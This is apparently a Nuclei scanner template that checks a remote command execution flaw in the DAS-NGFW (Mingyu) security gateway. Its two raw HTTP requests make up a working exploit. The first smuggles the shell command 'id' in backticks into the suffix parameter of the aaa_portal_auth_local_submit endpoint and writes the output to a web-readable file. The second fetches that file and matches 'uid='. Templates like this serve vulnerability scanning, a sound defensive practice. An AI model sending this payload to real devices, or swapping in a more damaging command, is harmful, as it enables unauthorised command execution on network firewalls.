id: das-ngfw-aaa-rce

info:
  name: 安恒 明御安全网关 aaa_portal_auth_local_submit 远程命令执行漏洞
  author: SleepingBag945
  severity: critical
  description: 安恒明御安全网关（简称：DAS-NGFW或NGFW）是面向云计算、数据中心和园区及企业网出口用户开发的新一代高性能防火墙设备。
  tags: das

variables:
  str1: '{{rand_base(6)}}'
  str2: '{{rand_base(6)}}'

http:
  - raw:
      - |
        GET /webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&suffix=%60id+%3E/usr/local/webui/test.txt%60 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
        Accept: */*
        Content-Type: application/x-www-form-urlencoded
        Accept-Encoding: gzip

      - |
        GET /test.txt HTTP/1.1
        Host: {{Hostname}}

    
    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200'
          - 'status_code_2 == 200'
          - 'contains(body_2, "uid=")'
        condition: and